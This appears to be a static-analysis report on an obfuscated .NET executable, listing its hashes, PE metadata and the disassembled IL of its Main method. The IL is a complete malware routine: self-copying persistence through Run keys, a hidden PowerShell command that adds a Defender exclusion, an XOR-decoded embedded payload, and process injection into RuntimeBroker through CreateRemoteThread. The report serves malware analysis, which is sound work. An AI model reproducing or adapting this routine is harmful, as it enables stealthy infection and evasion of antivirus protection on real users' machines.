Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | 2f09b79dd2720e8f888b6c951afeeef7
| Sha1 | 96f3caf92a21d052b594d670e1f87cec1a751867
| Sha256 | 6a86b3beed4068b73085adefe5be7d97acf1bbb349442243f6ab304641193bb3
| Sha384 | 2077bd2d45962bc2e2299bbb20d9a4dfece0c87ecfe365f572176d5e9288b65ba89efefc82ecf755cb706e2bb58894b0
| Sha512 | c41a620fdf209c77d6f04ac3b38ab7918c7ed4422a82fb6b7042ae63600b1152dfbdae1873aad09e34b44a3902446f2be40899a8770a60056a26d96fb9fa7642
| SSDeep | 3072:VhFtrVH4ZrCIira7bEwjE8wx3s/dEAGGG0Mpc4ltU9x:VLtaZrC9+7bE3rx3s/dEAGs8lq9
| TLSH | 07D30183CA5485A2FE7AC931067553501D9ED82F8B6E6F077B6C48AEF22D32930173B4

PeID

| Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | KTAMA_OFFICIAL.exe |
| Full Name | KTAMA_OFFICIAL.exe |
| EntryPoint | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Scope Name | KTAMA_OFFICIAL.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | KTAMA_OFFICIAL |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 9 |
| Main Method | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Main IL Instruction Count | 361 |
| Main IL | newobj System.Void 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::.ctor() stloc.s V_18 nop <null> nop <null> call System.String System.IO.Path::GetRandomFileName() call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stloc.0 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() call System.String System.IO.Path::GetExtension(System.String) call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() ldloc.2 <null> ldc.i4.1 <null> call System.Void System.IO.File::Copy(System.String,System.String,System.Boolean) nop <null> ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0078: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0077: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> 
callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_00AA: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_00A9: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_00B5: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00B5: nop nop <null> nop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_4 ldloc.s V_4 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_4 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_4 ldstr Add-MpPreference -ExclusionPath "{0}" ldloc.2 <null> call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_4 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() nop <null> nop <null> leave.s IL_00FE: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00FE: nop nop <null> nop <null> leave.s IL_0109: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_0109: nop nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0144: nop ldloc.3 
<null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0143: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_014D: nop pop <null> nop <null> nop <null> leave.s IL_014D: nop nop <null> call System.Boolean System.Net.NetworkInformation.NetworkInterface::GetIsNetworkAvailable() stloc.s V_19 ldloc.s V_19 brtrue.s IL_0161: ldc.i4.s 13 ldc.i4.s 99 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.s 13 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=13 <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldloc.s V_18 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr KTAMA_OFFICIAL callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stfld System.Byte[] 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::classNameBytes ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldloc.s V_18 ldftn System.Boolean 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::<Main>b__1(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) call System.Boolean System.Linq.Enumerable::Any<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01BC: ldc.i4 122443 ldc.i4.s 98 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 122443 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=122443 
<PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4.s 23 stloc.s V_8 ldloc.s V_7 ldlen <null> conv.i4 <null> newarr System.Byte stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_01FB: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldloc.s V_7 ldloc.s V_10 ldelem.u1 <null> ldloc.s V_8 xor <null> conv.u1 <null> stelem.i1 <null> ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_7 ldlen <null> conv.i4 <null> clt <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01E7: ldloc.s V_9 ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 brtrue.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldnull <null> ldftn System.Boolean 襜窦鳗肩桍榦鍺缜::<Main>b__3(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) stsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 br.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_11 ldloc.s V_11 ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_024E: ldc.i4 1082 ldc.i4.1 <null> call System.Void 
System.Environment::Exit(System.Int32) nop <null> ldc.i4 1082 ldc.i4.0 <null> ldloc.s V_11 callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr 襜窦鳗肩桍榦鍺缜::OpenProcess(System.UInt32,System.Boolean,System.UInt32) stloc.s V_12 ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_027E: nop ldc.i4.2 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.4 <null> call System.IntPtr 襜窦鳗肩桍榦鍺缜::VirtualAllocEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02B3: ldloc.s V_12 ldc.i4.3 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldloc.s V_9 ldlen <null> conv.i4 <null> ldloca.s V_14 call System.Boolean 襜窦鳗肩桍榦鍺缜::WriteProcessMemory(System.IntPtr,System.IntPtr,System.Byte[],System.UInt32,System.UInt32&) brfalse.s IL_02D2: ldc.i4.0 ldloc.s V_14 conv.u8 <null> ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> ceq <null> br.s IL_02D3: nop ldc.i4.0 <null> nop <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02E1: ldloc.s V_12 ldc.i4.4 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4.s 32 ldloca.s V_15 call System.Boolean 襜窦鳗肩桍榦鍺缜::VirtualProtectEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32&) stloc.s V_19 ldloc.s V_19 brtrue.s IL_02FF: ldloc.s V_12 ldc.i4.5 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldsfld System.IntPtr 
System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_16 call System.IntPtr 襜窦鳗肩桍榦鍺缜::CreateRemoteThread(System.IntPtr,System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_17 ldloc.s V_17 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0334: ldloc.s V_17 ldc.i4.6 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_17 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> leave.s IL_034A: nop nop <null> ldloc.s V_12 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> endfinally <null> nop <null> nop <null> ret <null> |